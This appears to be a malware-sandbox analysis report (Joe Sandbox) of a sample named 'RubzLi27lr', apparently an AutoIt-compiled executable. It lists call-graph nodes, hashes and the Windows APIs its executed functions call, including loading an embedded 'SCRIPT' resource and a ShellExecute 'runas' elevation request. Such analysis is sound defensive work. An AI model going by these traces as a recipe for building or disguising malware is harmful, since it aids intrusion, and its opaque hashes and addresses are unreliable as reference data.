97967->97934 97968->97943 97969->97940 97970 abf7bf 97971 abf7d3 97970->97971 97972 abfcb6 97970->97972 97973 abfcc2 97971->97973 97975 acfddb 22 API calls 97971->97975 98007 abaceb 23 API calls ISource 97972->98007 98008 abaceb 23 API calls ISource 97973->98008 97977 abf7e5 97975->97977 97977->97973 97978 abf83e 97977->97978 97979 abfd3d 97977->97979 97981 ac1310 235 API calls 97978->97981 98003 abed9d ISource 97978->98003 98009 b21155 22 API calls 97979->98009 98002 abec76 ISource 97981->98002 97982 acfddb 22 API calls 97982->98002 97983 abfef7 97989 aba8c7 22 API calls 97983->97989 97983->98003 97986 b04600 97991 aba8c7 22 API calls 97986->97991 97986->98003 97987 b04b0b 98011 b2359c 82 API calls __wsopen_s 97987->98011 97989->98003 97991->98003 97993 ad0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97993->98002 97994 aba8c7 22 API calls 97994->98002 97995 abfbe3 97997 b04bdc 97995->97997 97995->98003 98004 abf3ae ISource 97995->98004 97996 aba961 22 API calls 97996->98002 98012 b2359c 82 API calls __wsopen_s 97997->98012 97999 b04beb 98013 b2359c 82 API calls __wsopen_s 97999->98013 98000 ad01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98000->98002 98001 ad00a3 29 API calls pre_c_initialization 98001->98002 98002->97982 98002->97983 98002->97986 98002->97987 98002->97993 98002->97994 98002->97995 98002->97996 98002->97999 98002->98000 98002->98001 98002->98003 98002->98004 98005 ac01e0 235 API calls 2 library calls 98002->98005 98006 ac06a0 41 API calls ISource 98002->98006 98004->98003 98010 b2359c 82 API calls __wsopen_s 98004->98010 98005->98002 98006->98002 98007->97973 98008->97979 98009->98003 98010->98003 98011->98003 98012->97999 98013->98003 98014 ad03fb 98015 ad0407 ___scrt_is_nonwritable_in_current_image 98014->98015 98043 acfeb1 98015->98043 98017 ad040e 98018 ad0561 98017->98018 98022 ad0438 98017->98022 98070 ad083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98018->98070 98020 ad0568 98071 ad4e52 28 API calls _abort 98020->98071 98032 ad0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98022->98032 98054 ae247d 98022->98054 98023 ad056e 98072 ad4e04 28 API calls _abort 98023->98072 98027 ad0576 98028 ad0457 98030 ad04d8 98062 ad0959 98030->98062 98032->98030 98066 ad4e1a 38 API calls 3 library calls 98032->98066 98034 ad04de 98035 ad04f3 98034->98035 98067 ad0992 GetModuleHandleW 98035->98067 98037 ad04fa 98037->98020 98038 ad04fe 98037->98038 98039 ad0507 98038->98039 98068 ad4df5 28 API calls _abort 98038->98068 98069 ad0040 13 API calls 2 library calls 98039->98069 98042 ad050f 98042->98028 98044 acfeba 98043->98044 98073 ad0698 IsProcessorFeaturePresent 98044->98073 98046 acfec6 98074 ad2c94 10 API calls 3 library calls 98046->98074 98048 acfecb 98053 acfecf 98048->98053 98075 ae2317 98048->98075 98051 acfee6 98051->98017 98053->98017 98057 ae2494 98054->98057 98055 ad0a8c _ValidateLocalCookies 5 API calls 98056 ad0451 98055->98056 98056->98028 98058 ae2421 98056->98058 98057->98055 98060 ae2450 98058->98060 98059 ad0a8c _ValidateLocalCookies 5 API calls 98061 ae2479 98059->98061 98060->98059 98061->98032 98118 ad2340 98062->98118 98065 ad097f 98065->98034 98066->98030 98067->98037 98068->98039 98069->98042 98070->98020 98071->98023 98072->98027 98073->98046 98074->98048 98079 aed1f6 98075->98079 98078 ad2cbd 8 API calls 3 library calls 98078->98053 98082 aed213 98079->98082 98083 aed20f 98079->98083 98080 ad0a8c _ValidateLocalCookies 5 API calls 98081 acfed8 98080->98081 98081->98051 98081->98078 98082->98083 98085 ae4bfb 98082->98085 98083->98080 98086 ae4c07 ___scrt_is_nonwritable_in_current_image 98085->98086 98097 ae2f5e EnterCriticalSection 98086->98097 98088 ae4c0e 98098 ae50af 98088->98098 98090 ae4c1d 98096 ae4c2c 98090->98096 98111 ae4a8f 29 API calls 98090->98111 98093 ae4c27 98112 ae4b45 GetStdHandle GetFileType 98093->98112 98094 ae4c3d __wsopen_s 98094->98082 98113 ae4c48 LeaveCriticalSection _abort 98096->98113 98097->98088 98099 ae50bb ___scrt_is_nonwritable_in_current_image 98098->98099 98100 ae50df 98099->98100 98101 ae50c8 98099->98101 98114 ae2f5e EnterCriticalSection 98100->98114 98115 adf2d9 20 API calls __dosmaperr 98101->98115 98104 ae50cd 98116 ae27ec 26 API calls pre_c_initialization 98104->98116 98106 ae50d7 __wsopen_s 98106->98090 98107 ae5117 98117 ae513e LeaveCriticalSection _abort 98107->98117 98109 ae50eb 98109->98107 98110 ae5000 __wsopen_s 21 API calls 98109->98110 98110->98109 98111->98093 98112->98096 98113->98094 98114->98109 98115->98104 98116->98106 98117->98106 98119 ad096c GetStartupInfoW 98118->98119 98119->98065 98120 ab1033 98125 ab4c91 98120->98125 98124 ab1042 98126 aba961 22 API calls 98125->98126 98127 ab4cff 98126->98127 98133 ab3af0 98127->98133 98130 ab4d9c 98131 ab1038 98130->98131 98136 ab51f7 22 API calls __fread_nolock 98130->98136 98132 ad00a3 29 API calls __onexit 98131->98132 98132->98124 98137 ab3b1c 98133->98137 98136->98130 98138 ab3b0f 98137->98138 98139 ab3b29 98137->98139 98138->98130 98139->98138 98140 ab3b30 RegOpenKeyExW 98139->98140 98140->98138 98141 ab3b4a RegQueryValueExW 98140->98141 98142 ab3b80 RegCloseKey 98141->98142 98143 ab3b6b 98141->98143 98142->98138 98143->98142 98144 ab2e37 98145 aba961 22 API calls 98144->98145 98146 ab2e4d 98145->98146 98223 ab4ae3 98146->98223 98148 ab2e6b 98149 ab3a5a 24 API calls 98148->98149 98150 ab2e7f 98149->98150 98151 ab9cb3 22 API calls 98150->98151 98152 ab2e8c 98151->98152 98153 ab4ecb 94 API calls 98152->98153 98154 ab2ea5 98153->98154 98155 ab2ead 98154->98155 98156 af2cb0 98154->98156 98160 aba8c7 22 API calls 98155->98160 98157 b22cf9 80 API calls 98156->98157 98158 af2cc3 98157->98158 98159 af2ccf 98158->98159 98162 ab4f39 68 API calls 98158->98162 98165 ab4f39 68 API calls 98159->98165 98161 ab2ec3 98160->98161 98237 ab6f88 22 API calls 98161->98237 98162->98159 98164 ab2ecf 98166 ab9cb3 22 API calls 98164->98166 98167 af2ce5 98165->98167 98168 ab2edc 98166->98168 98253 ab3084 22 API calls 98167->98253 98238 aba81b 41 API calls 98168->98238 98171 ab2eec 98173 ab9cb3 22 API calls 98171->98173 98172 af2d02 98254 ab3084 22 API calls 98172->98254 98175 ab2f12 98173->98175 98239 aba81b 41 API calls 98175->98239 98176 af2d1e 98178 ab3a5a 24 API calls 98176->98178 98179 af2d44 98178->98179 98255 ab3084 22 API calls 98179->98255 98180 ab2f21 98182 aba961 22 API calls 98180->98182 98184 ab2f3f 98182->98184 98183 af2d50 98185 aba8c7 22 API calls 98183->98185 98240 ab3084 22 API calls 98184->98240 98187 af2d5e 98185->98187 98256 ab3084 22 API calls 98187->98256 98188 ab2f4b 98241 ad4a28 40 API calls 3 library calls 98188->98241 98190 af2d6d 98194 aba8c7 22 API calls 98190->98194 98192 ab2f59 98192->98167 98193 ab2f63 98192->98193 98242 ad4a28 40 API calls 3 library calls 98193->98242 98196 af2d83 98194->98196 98257 ab3084 22 API calls 98196->98257 98197 ab2f6e 98197->98172 98199 ab2f78 98197->98199 98243 ad4a28 40 API calls 3 library calls 98199->98243 98200 af2d90 98202 ab2f83 98202->98176 98203 ab2f8d 98202->98203 98244 ad4a28 40 API calls 3 library calls 98203->98244 98205 ab2f98 98206 ab2fdc 98205->98206 98245 ab3084 22 API calls 98205->98245 98206->98190 98207 ab2fe8 98206->98207 98207->98200 98247 ab63eb 22 API calls 98207->98247 98209 ab2fbf 98211 aba8c7 22 API calls 98209->98211 98213 ab2fcd 98211->98213 98212 ab2ff8 98248 ab6a50 22 API calls 98212->98248 98246 ab3084 22 API calls 98213->98246 98216 ab3006 98249 ab70b0 23 API calls 98216->98249 98220 ab3021 98221 ab3065 98220->98221 98250 ab6f88 22 API calls 98220->98250 98251 ab70b0 23 API calls 98220->98251 98252 ab3084 22 API calls 98220->98252 98224 ab4af0 __wsopen_s 98223->98224 98225 ab6b57 22 API calls 98224->98225 98226 ab4b22 98224->98226 98225->98226 98227 ab4c6d 22 API calls 98226->98227 98236 ab4b58 98226->98236 98227->98226 98228 ab9cb3 22 API calls 98230 ab4c52 98228->98230 98229 ab9cb3 22 API calls 98229->98236 98232 ab515f 22 API calls 98230->98232 98231 ab4c6d 22 API calls 98231->98236 98234 ab4c5e 98232->98234 98233 ab515f 22 API calls 98233->98236 98234->98148 98235 ab4c29 98235->98228 98235->98234 98236->98229 98236->98231 98236->98233 98236->98235 98237->98164 98238->98171 98239->98180 98240->98188 98241->98192 98242->98197 98243->98202 98244->98205 98245->98209 98246->98206 98247->98212 98248->98216 98249->98220 98250->98220 98251->98220 98252->98220 98253->98172 98254->98176 98255->98183 98256->98190 98257->98200 98258 ab3156 98261 ab3170 98258->98261 98262 ab3187 98261->98262 98263 ab31eb 98262->98263 98264 ab318c 98262->98264 98299 ab31e9 98262->98299 98268 af2dfb 98263->98268 98269 ab31f1 98263->98269 98265 ab3199 98264->98265 98266 ab3265 PostQuitMessage 98264->98266 98271 af2e7c 98265->98271 98272 ab31a4 98265->98272 98303 ab316a 98266->98303 98267 ab31d0 DefWindowProcW 98267->98303 98317 ab18e2 10 API calls 98268->98317 98273 ab31f8 98269->98273 98274 ab321d SetTimer RegisterWindowMessageW 98269->98274 98322 b1bf30 34 API calls ___scrt_fastfail 98271->98322 98276 ab31ae 98272->98276 98277 af2e68 98272->98277 98280 af2d9c 98273->98280 98281 ab3201 KillTimer 98273->98281 98278 ab3246 CreatePopupMenu 98274->98278 98274->98303 98275 af2e1c 98318 ace499 42 API calls 98275->98318 98284 ab31b9 98276->98284 98294 af2e4d 98276->98294 98306 b1c161 98277->98306 98278->98303 98285 af2dd7 MoveWindow 98280->98285 98286 af2da1 98280->98286 98313 ab30f2 Shell_NotifyIconW ___scrt_fastfail 98281->98313 98289 ab3253 98284->98289 98290 ab31c4 98284->98290 98285->98303 98292 af2da7 98286->98292 98293 af2dc6 SetFocus 98286->98293 98288 ab3214 98314 ab3c50 DeleteObject DestroyWindow 98288->98314 98315 ab326f 44 API calls ___scrt_fastfail 98289->98315 98290->98267 98319 ab30f2 Shell_NotifyIconW ___scrt_fastfail 98290->98319 98291 af2e8e 98291->98267 98291->98303 98292->98290 98297 af2db0 98292->98297 98293->98303 98294->98267 98321 b10ad7 22 API calls 98294->98321 98316 ab18e2 10 API calls 98297->98316 98299->98267 98300 ab3263 98300->98303 98304 af2e41 98320 ab3837 49 API calls ___scrt_fastfail 98304->98320 98307 b1c276 98306->98307 98308 b1c179 ___scrt_fastfail 98306->98308 98307->98303 98323 ab3923 98308->98323 98310 b1c25f KillTimer SetTimer 98310->98307 98311 b1c1a0 98311->98310 98312 b1c251 Shell_NotifyIconW 98311->98312 98312->98310 98313->98288 98314->98303 98315->98300 98316->98303 98317->98275 98318->98290 98319->98304 98320->98299 98321->98299 98322->98291 98324 ab393f 98323->98324 98343 ab3a13 98323->98343 98325 ab6270 22 API calls 98324->98325 98326 ab394d 98325->98326 98327 ab395a 98326->98327 98328 af3393 LoadStringW 98326->98328 98329 ab6b57 22 API calls 98327->98329 98330 af33ad 98328->98330 98331 ab396f 98329->98331 98335 aba8c7 22 API calls 98330->98335 98338 ab3994 ___scrt_fastfail 98330->98338 98332 af33c9 98331->98332 98333 ab397c 98331->98333 98334 ab6350 22 API calls 98332->98334 98333->98330 98336 ab3986 98333->98336 98339 af33d7 98334->98339 98335->98338 98337 ab6350 22 API calls 98336->98337 98337->98338 98341 ab39f9 Shell_NotifyIconW 98338->98341 98339->98338 98340 ab33c6 22 API calls 98339->98340 98342 af33f9 98340->98342 98341->98343 98344 ab33c6 22 API calls 98342->98344 98343->98311 98344->98338

                                                                                                                  Executed Functions

                                                                                                                  Function 00AB42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 234 ab42de-ab434d call aba961 GetVersionExW call ab6b57 239 af3617-af362a 234->239 240 ab4353 234->240 241 af362b-af362f 239->241 242 ab4355-ab4357 240->242 245 af3632-af363e 241->245 246 af3631 241->246 243 ab435d-ab43bc call ab93b2 call ab37a0 242->243 244 af3656 242->244 262 af37df-af37e6 243->262 263 ab43c2-ab43c4 243->263 249 af365d-af3660 244->249 245->241 248 af3640-af3642 245->248 246->245 248->242 251 af3648-af364f 248->251 252 ab441b-ab4435 GetCurrentProcess IsWow64Process 249->252 253 af3666-af36a8 249->253 251->239 255 af3651 251->255 258 ab4437 252->258 259 ab4494-ab449a 252->259 253->252 256 af36ae-af36b1 253->256 255->244 260 af36db-af36e5 256->260 261 af36b3-af36bd 256->261 264 ab443d-ab4449 258->264 259->264 268 af36f8-af3702 260->268 269 af36e7-af36f3 260->269 265 af36bf-af36c5 261->265 266 af36ca-af36d6 261->266 270 af37e8 262->270 271 af3806-af3809 262->271 263->249 267 ab43ca-ab43dd 263->267 272 ab444f-ab445e LoadLibraryA 264->272 273 af3824-af3828 GetSystemInfo 264->273 265->252 266->252 274 ab43e3-ab43e5 267->274 275 af3726-af372f 267->275 277 af3715-af3721 268->277 278 af3704-af3710 268->278 269->252 276 af37ee 270->276 279 af380b-af381a 271->279 280 af37f4-af37fc 271->280 281 ab449c-ab44a6 GetSystemInfo 272->281 282 ab4460-ab446e GetProcAddress 272->282 285 ab43eb-ab43ee 274->285 286 af374d-af3762 274->286 287 af373c-af3748 275->287 288 af3731-af3737 275->288 276->280 277->252 278->252 279->276 289 af381c-af3822 279->289 280->271 284 ab4476-ab4478 281->284 282->281 283 ab4470-ab4474 GetNativeSystemInfo 282->283 283->284 290 ab447a-ab447b FreeLibrary 284->290 291 ab4481-ab4493 284->291 292 af3791-af3794 285->292 293 ab43f4-ab440f 285->293 294 af376f-af377b 286->294 295 af3764-af376a 286->295 287->252 288->252 289->280 290->291 292->252 296 af379a-af37c1 292->296 297 ab4415 293->297 298 af3780-af378c 293->298 294->252 295->252 299 af37ce-af37da 296->299 300 af37c3-af37c9 296->300 297->252 298->252 299->252 300->252
                                                                                                                  APIs
                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00AB430D
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                  • GetCurrentProcess.KERNEL32(?,00B4CB64,00000000,?,?), ref: 00AB4422
                                                                                                                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 00AB4429
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00AB4454
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AB4466
                                                                                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00AB4474
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AB447B
                                                                                                                  • GetSystemInfo.KERNEL32(?,?,?), ref: 00AB44A0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                  • API String ID: 3290436268-3101561225
                                                                                                                  • Opcode ID: 268584ceac97166fa12bf21d3ef14bc531160fd55adb35bf20aa5839e54a3d3c
                                                                                                                  • Instruction ID: 30b8b920fa0de49739647a6f966e572dd46e58fd9413636157c26b17e432d6be
                                                                                                                  • Opcode Fuzzy Hash: 268584ceac97166fa12bf21d3ef14bc531160fd55adb35bf20aa5839e54a3d3c
                                                                                                                  • Instruction Fuzzy Hash: 74A1837690B2C4FFCB12D7AD7C411E57FEC7B2A740B084C99E18197A33DA60460ADB69
                                                                                                                  Function 00AB42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 637 ab42a2-ab42ba CreateStreamOnHGlobal 638 ab42da-ab42dd 637->638 639 ab42bc-ab42d3 FindResourceExW 637->639 640 ab42d9 639->640 641 af35ba-af35c9 LoadResource 639->641 640->638 641->640 642 af35cf-af35dd SizeofResource 641->642 642->640 643 af35e3-af35ee LockResource 642->643 643->640 644 af35f4-af3612 643->644 644->640
                                                                                                                  APIs
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00AB50AA,?,?,00000000,00000000), ref: 00AB42B2
                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AB50AA,?,?,00000000,00000000), ref: 00AB42C9
                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,00AB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AB4F20), ref: 00AF35BE
                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00AB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AB4F20), ref: 00AF35D3
                                                                                                                  • LockResource.KERNEL32(00AB50AA,?,?,00AB50AA,?,?,00000000,00000000,?,?,?,?,?,?,00AB4F20,?), ref: 00AF35E6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                  • String ID: SCRIPT
                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                  • Opcode ID: 78267e99e4301e23a61125688530ac750d384f1c3f80e818ac52ec33ec7e487a
                                                                                                                  • Instruction ID: 941e787c153b799be1b97b42f6f1e26023ba7e7b64e10f951824b7f273c6ff50
                                                                                                                  • Opcode Fuzzy Hash: 78267e99e4301e23a61125688530ac750d384f1c3f80e818ac52ec33ec7e487a
                                                                                                                  • Instruction Fuzzy Hash: 57117C75201B00BFEB218FA5DC49FA77BBDEBCAB51F204169F40296261DBB1D9109A20
                                                                                                                  Function 00AF2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB2B6B
                                                                                                                    • Part of subcall function 00AB3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B81418,?,00AB2E7F,?,?,?,00000000), ref: 00AB3A78
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,?,?,00B72224), ref: 00AF2C10
                                                                                                                  • ShellExecuteW.SHELL32(00000000,?,?,00B72224), ref: 00AF2C17
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                  • String ID: runas
                                                                                                                  • API String ID: 448630720-4000483414
                                                                                                                  • Opcode ID: a1c5142d6438b193cbcd300a4ab905ec5340ce44c5162be1cd2b8bfc7b60902e
                                                                                                                  • Instruction ID: 8f084c8e557d77dcdde2daf8649cc8c4a66056a22f167a1ae51af8a97f3a4373
                                                                                                                  • Opcode Fuzzy Hash: a1c5142d6438b193cbcd300a4ab905ec5340ce44c5162be1cd2b8bfc7b60902e
                                                                                                                  • Instruction Fuzzy Hash: 4411B4322093056ACB14FFA4DA51AFE7BECAB91740F44186DF146571B3CF218A4AD712
                                                                                                                  Function 00B1DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(?,00AF5222), ref: 00B1DBCE
                                                                                                                  • GetFileAttributesW.KERNELBASE(?), ref: 00B1DBDD
                                                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00B1DBEE
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00B1DBFA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2695905019-0
                                                                                                                  • Opcode ID: 43db401e1372e31193c823b87c49acc951ba2ded165030d33a0af9ebee86fc62
                                                                                                                  • Instruction ID: 1f5fe16e08b2a579e2dfada08d9fa05e037384af31e8636158ada63d68ce8f30
                                                                                                                  • Opcode Fuzzy Hash: 43db401e1372e31193c823b87c49acc951ba2ded165030d33a0af9ebee86fc62
                                                                                                                  • Instruction Fuzzy Hash: 97F0A0388119105782606F78AC0D8EA3BACEE02334B904F42F936C20E0EFF05A94C6D5
                                                                                                                  Function 00ABD730 Relevance: 21.6, APIs: 14, Instructions: 619windowsleeptimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetInputState.USER32 ref: 00ABD807
                                                                                                                  • timeGetTime.WINMM ref: 00ABDA07
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ABDB28
                                                                                                                  • TranslateMessage.USER32(?), ref: 00ABDB7B
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00ABDB89
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ABDB9F
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00ABDBB1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2189390790-0
                                                                                                                  • Opcode ID: 04959d9c0ff2e8e2f2ef5e04d9fbd9356b5cba01461293cb2e72773bf7a70618
                                                                                                                  • Instruction ID: c604af65577b7913aa6eb5b8a5c50700f4c2b5eff72fb2f1d6c358e22f30df9c
                                                                                                                  • Opcode Fuzzy Hash: 04959d9c0ff2e8e2f2ef5e04d9fbd9356b5cba01461293cb2e72773bf7a70618
                                                                                                                  • Instruction Fuzzy Hash: D742D570604341EFD729CF24C899BAABBF9FF45304F14495DE456872A2EB71E848CB92
                                                                                                                  Function 00AB2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00AB2D07
                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00AB2D31
                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB2D42
                                                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00AB2D5F
                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AB2D6F
                                                                                                                  • LoadIconW.USER32(000000A9), ref: 00AB2D85
                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AB2D94
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                                  • Opcode ID: a178579d14e3af6201386424eff42e49c4f48c768659e167c261f4f32d8ddd7f
                                                                                                                  • Instruction ID: c335766e2587896cf88d4acafcf4dfc3ea088b3ac86afc4349aedaeea1f7088f
                                                                                                                  • Opcode Fuzzy Hash: a178579d14e3af6201386424eff42e49c4f48c768659e167c261f4f32d8ddd7f
                                                                                                                  • Instruction Fuzzy Hash: 7221B2B5912218AFDB40DFA8EC49BDDBFB8FB09B00F00451AE511A72A0DBB14645CF95
                                                                                                                  Function 00AF065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
